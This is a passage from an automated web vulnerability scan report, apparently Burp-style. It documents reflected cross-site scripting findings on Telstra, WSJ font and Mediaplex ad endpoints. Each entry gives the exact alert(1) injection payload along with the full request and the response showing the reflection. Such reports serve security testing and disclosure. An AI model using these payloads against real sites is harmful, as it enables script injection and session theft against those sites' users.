;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesebd4d"><script>alert(1)</script>62f7eabc170/soundcloud%0AServer: content.usv.com%0APath: /pagesebd4d">
...[SNIP]...

3.161. http://crowdsupport.telstra.com/t5/forums/forumpage.twitterstreamtaplet:getnewtweets [renderedScripts parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://crowdsupport.telstra.com
Path:   /t5/forums/forumpage.twitterstreamtaplet:getnewtweets

Issue detail

The value of the renderedScripts request parameter is copied into the HTML document as plain text between tags. The payload 37013<img%20src%3da%20onerror%3dalert(1)>2052689086b was submitted in the renderedScripts parameter. This input was echoed as 37013<img src=a onerror=alert(1)>2052689086b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /t5/forums/forumpage.twitterstreamtaplet:getnewtweets?t:ac=board-id/PrepaidMobiles&t:cp=twitter/streamcontributionspage HTTP/1.1
Host: crowdsupport.telstra.com
Proxy-Connection: keep-alive
Content-Length: 1297
Origin: http://crowdsupport.telstra.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Lithium-Ajax-Request: true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://crowdsupport.telstra.com/t5/Prepaid-Mobiles/bd-p/PrepaidMobiles
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A984851D17A0-400001414000001C[CE]; VISITORID=1277333297; LiSESSIONID=6D619BB30014D23EDBCC5DB0AA4791E9; s_loggedin=not%20logged%20in; mbox=session#1317840717795-784590#1317842648|check#true#1317840848; s_cc=true; s_nr=1317840787375; scPrevious=CrowdSupport; s_sq=%5B%5BB%5D%5D

streamContextClientId=twitterStreamTaplet&is_first=true&last=0&first=0&eventListeners=%5B%5D&parameterOverrides=%7B%7D&triggerEvent=LITHIUM%3AgetNewTweets&eventTargetId=tweetListContainer&javascript.i
...[SNIP]...
e-shim-1.0.js%2Cjquery.viewport-1.0.js%2Cjquery.clone-position-1.0.js%2CDropDownMenu.js%2Cjquery.lithium-selector-extensions.js%2Ccontrol.js%2CDeferredImages.js%2Cjquery.css-data-1.0.js%2Cui.dialog.js37013<img%20src%3da%20onerror%3dalert(1)>2052689086b

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:52:28 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 17305

{
"response" : {
"status" : "success",
"state" : "success",
"parameters" : [ ],
"components" : [
{
"selector" : "ORIGINAL_ELEMENT",
"content" : "<div class=\"li
...[SNIP]...
"DropDownMenu.js",
"jquery.lithium-selector-extensions.js",
"control.js",
"DeferredImages.js",
"jquery.css-data-1.0.js",
"ui.dialog.js37013<img src=a onerror=alert(1)>2052689086b",
"TwitterItemActions.js"
],
"instantiations" : "LITHIUM.AjaxFeedback('.lia-inline-ajax-feedback', 'LITHIUM:hideAjaxFeedback');"
},
"action" : "prepend"
...[SNIP]...

3.162. http://fonts.wsj.com/k/qox0wee-e.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.wsj.com
Path:   /k/qox0wee-e.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 385ba<script>alert(1)</script>b610dbcac07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k385ba<script>alert(1)</script>b610dbcac07/qox0wee-e.css?3bb2a6e53c9684ffdc9a9bf61d5b2a62d6138ae381e419350a9e4b6a2ea4b26f81a44a9a3fd76d172c69fe2029381463ad3b2b9f57efd95582df0742cea8deb803244f67617f9d0625a9b0c6afe6273d11b54d031342ae7abf5f75e41d0992b0561404d8a9488b9b7abb6b HTTP/1.1
Host: fonts.wsj.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://blogs.wsj.com/venturecapital/?mod=tech
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=a9f70429-8dde-40da-bdf0-2a1b9d55e44d; s_dbfe=1315153085111; __qca=P0-1921865836-1315416083538; s_vnum=1320338023520%26vn%3D2; __utma=109079514.1674775488.1317755585.1317755585.1317755585.1; __utmz=109079514.1317755585.1.1.utmcsr=online.wsj.com|utmccn=(referral)|utmcmd=referral|utmcct=/home-page; DJCOOKIE=ORC%3dna%2cus%7c%7cHOMEPAGE%3d%2fhome%2fasia%7c%7cGC%3d1%7c%7cweatherJson%3d%7b%22city%22%3a%22New%20York%22%2c%22image%22%3a%2235%22%2c%22high%22%3a%5b%2264%22%5d%2c%22low%22%3a%5b%2252%22%5d%2c%22url%22%3a%22http%3a%2f%2fonline.wsj.com%2fpublic%2fpage%2faccuweather%2ddetailed%2dforecast.html%3fname%3dNew%20York%2c%20NY%26location%3d10005%26u%3dhttp%253A%2f%2fwww.accuweather.com%2fhosted%2fwsj%2fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2f%2fwww.accuweather.com%2fhosted%2fwsj%2fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7d%7c%7cweatherCode%3d10005%7c%7cweatherExpire%3dTue%2c%2004%20Oct%202011%2019%3a20%3a32%20GMT%7c%7cGX%3dMon%2c%2005%20Sep%202011%2016%3a18%3a04%20GMT%7c%7cweatherUser%3d; rsi_csl=; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000775
Content-Length: 68
Date: Wed, 05 Oct 2011 21:12:03 GMT
Connection: close

Not Found: /k385ba<script>alert(1)</script>b610dbcac07/qox0wee-e.css

3.163. http://fonts.wsj.com/k/qox0wee-e.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.wsj.com
Path:   /k/qox0wee-e.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b2271<script>alert(1)</script>26bf83752ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/qox0wee-e.cssb2271<script>alert(1)</script>26bf83752ce?3bb2a6e53c9684ffdc9a9bf61d5b2a62d6138ae381e419350a9e4b6a2ea4b26f81a44a9a3fd76d172c69fe2029381463ad3b2b9f57efd95582df0742cea8deb803244f67617f9d0625a9b0c6afe6273d11b54d031342ae7abf5f75e41d0992b0561404d8a9488b9b7abb6b HTTP/1.1
Host: fonts.wsj.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://blogs.wsj.com/venturecapital/?mod=tech
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=a9f70429-8dde-40da-bdf0-2a1b9d55e44d; s_dbfe=1315153085111; __qca=P0-1921865836-1315416083538; s_vnum=1320338023520%26vn%3D2; __utma=109079514.1674775488.1317755585.1317755585.1317755585.1; __utmz=109079514.1317755585.1.1.utmcsr=online.wsj.com|utmccn=(referral)|utmcmd=referral|utmcct=/home-page; DJCOOKIE=ORC%3dna%2cus%7c%7cHOMEPAGE%3d%2fhome%2fasia%7c%7cGC%3d1%7c%7cweatherJson%3d%7b%22city%22%3a%22New%20York%22%2c%22image%22%3a%2235%22%2c%22high%22%3a%5b%2264%22%5d%2c%22low%22%3a%5b%2252%22%5d%2c%22url%22%3a%22http%3a%2f%2fonline.wsj.com%2fpublic%2fpage%2faccuweather%2ddetailed%2dforecast.html%3fname%3dNew%20York%2c%20NY%26location%3d10005%26u%3dhttp%253A%2f%2fwww.accuweather.com%2fhosted%2fwsj%2fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2f%2fwww.accuweather.com%2fhosted%2fwsj%2fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7d%7c%7cweatherCode%3d10005%7c%7cweatherExpire%3dTue%2c%2004%20Oct%202011%2019%3a20%3a32%20GMT%7c%7cGX%3dMon%2c%2005%20Sep%202011%2016%3a18%3a04%20GMT%7c%7cweatherUser%3d; rsi_csl=; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000767
Content-Length: 68
Date: Wed, 05 Oct 2011 21:12:06 GMT
Connection: close

Not Found: /k/qox0wee-e.cssb2271<script>alert(1)</script>26bf83752ce

3.164. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9292'%3balert(1)//d530c4db51c was submitted in the mpck parameter. This input was echoed as f9292';alert(1)//d530c4db51c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D6156764f9292'%3balert(1)//d530c4db51c&mpt=6156764&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/y%3B207642206%3B0-0%3B0%3B33078170%3B4307-300/250%3B33472683/33490561/1%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%7Eokv%3D%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%3Bmc%3Db2pfreezone%3Btile%3D3%3Bsz%3D300x250%2C336x280%3B%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/blog_bankruptcy;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;ord=1805180518051805;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 21:13:03 GMT
Server: Apache
Last-Modified: Thu, 14 Jul 2011 22:32:50 GMT
ETag: "6a1364-f9e-4a80f1ceb4880"
Accept-Ranges: bytes
Content-Length: 5390
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
61/1;u=****300x250,336x280********;~okv=;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;;~aopt=6/0/ff/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/13754-86576-1281-0?mpt=6156764f9292';alert(1)//d530c4db51c" target="_blank">
...[SNIP]...

3.165. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2209"-alert(1)-"06eaa568993 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D6156764b2209"-alert(1)-"06eaa568993&mpt=6156764&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/y%3B207642206%3B0-0%3B0%3B33078170%3B4307-300/250%3B33472683/33490561/1%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%7Eokv%3D%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%3Bmc%3Db2pfreezone%3Btile%3D3%3Bsz%3D300x250%2C336x280%3B%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/blog_bankruptcy;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;ord=1805180518051805;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 21:13:01 GMT
Server: Apache
Last-Modified: Thu, 14 Jul 2011 22:32:50 GMT
ETag: "6a1364-f9e-4a80f1ceb4880"
Accept-Ranges: bytes
Content-Length: 5384
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D6156764b2209"-alert(1)-"06eaa568993");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D6156764b2209"-alert(1)-"06eaa568993");
mpck = "htt
...[SNIP]...

3.166. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5a95"%3balert(1)//b3260482d6e was submitted in the mpvc parameter. This input was echoed as c5a95";alert(1)//b3260482d6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D6156764&mpt=6156764&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/y%3B207642206%3B0-0%3B0%3B33078170%3B4307-300/250%3B33472683/33490561/1%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%7Eokv%3D%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%3Bmc%3Db2pfreezone%3Btile%3D3%3Bsz%3D300x250%2C336x280%3B%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3fc5a95"%3balert(1)//b3260482d6e HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/blog_bankruptcy;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;ord=1805180518051805;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 21:13:13 GMT
Server: Apache
Last-Modified: Thu, 14 Jul 2011 22:32:50 GMT
ETag: "6a1364-f9e-4a80f1ceb4880"
Accept-Ranges: bytes
Content-Length: 5386
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
b97/3/0/*/y;207642206;0-0;0;33078170;4307-300/250;33472683/33490561/1;u=****300x250,336x280********;~okv=;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;;~aopt=6/0/ff/0;~sscs=?c5a95";alert(1)//b3260482d6e");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b97/3/0/*/y;207642206;0-0;0;33078170;4307-300/250;33472683/33490561/1;u=****300x250,3
...[SNIP]...

3.167. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c6a0'%3balert(1)//30af109326a was submitted in the mpvc parameter. This input was echoed as 8c6a0';alert(1)//30af109326a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D6156764&mpt=6156764&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/y%3B207642206%3B0-0%3B0%3B33078170%3B4307-300/250%3B33472683/33490561/1%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%7Eokv%3D%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%3Bmc%3Db2pfreezone%3Btile%3D3%3Bsz%3D300x250%2C336x280%3B%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f8c6a0'%3balert(1)//30af109326a HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/blog_bankruptcy;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;ord=1805180518051805;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 21:13:15 GMT
Server: Apache
Last-Modified: Thu, 14 Jul 2011 22:32:50 GMT
ETag: "6a1364-f9e-4a80f1ceb4880"
Accept-Ranges: bytes
Content-Length: 5386
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
b97/3/0/*/y;207642206;0-0;0;33078170;4307-300/250;33472683/33490561/1;u=****300x250,336x280********;~okv=;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;;~aopt=6/0/ff/0;~sscs=?8c6a0';alert(1)//30af109326ahttp://altfarm.mediaplex.com/ad/ck/13754-86576-1281-0?mpt=6156764" target="_blank">
...[SNIP]...

3.168. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2cca'%3balert(1)//6164b81c3de was submitted in the mpck parameter. This input was echoed as a2cca';alert(1)//6164b81c3de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D3602914a2cca'%3balert(1)//6164b81c3de&mpt=3602914&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/b%3B207642206%3B0-0%3B0%3B67183576%3B4307-300/250%3B33472683/33490561/1%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%7Eokv%3D%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%3Bmc%3Db2pfreezone%3Btile%3D3%3Bsz%3D300x250%2C336x280%3B%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/blog_law;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;ord=2512251225122512;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 21:13:43 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 17:55:15 GMT
ETag: "6fb685-f97-4a81f5a0b86c0"
Accept-Ranges: bytes
Content-Length: 5383
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
61/1;u=****300x250,336x280********;~okv=;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;;~aopt=6/0/ff/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/13754-86576-1281-0?mpt=3602914a2cca';alert(1)//6164b81c3de" target="_blank">
...[SNIP]...

3.169. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9c82"-alert(1)-"0bf514e8e3 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D3602914a9c82"-alert(1)-"0bf514e8e3&mpt=3602914&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/b%3B207642206%3B0-0%3B0%3B67183576%3B4307-300/250%3B33472683/33490561/1%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%7Eokv%3D%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%3Bmc%3Db2pfreezone%3Btile%3D3%3Bsz%3D300x250%2C336x280%3B%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/blog_law;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;ord=2512251225122512;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 21:13:41 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 17:55:15 GMT
ETag: "6fb685-f97-4a81f5a0b86c0"
Accept-Ranges: bytes
Content-Length: 5373
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D3602914a9c82"-alert(1)-"0bf514e8e3");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D3602914a9c82"-alert(1)-"0bf514e8e3");
mpck = "http
...[SNIP]...

3.170. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js

Issue detail

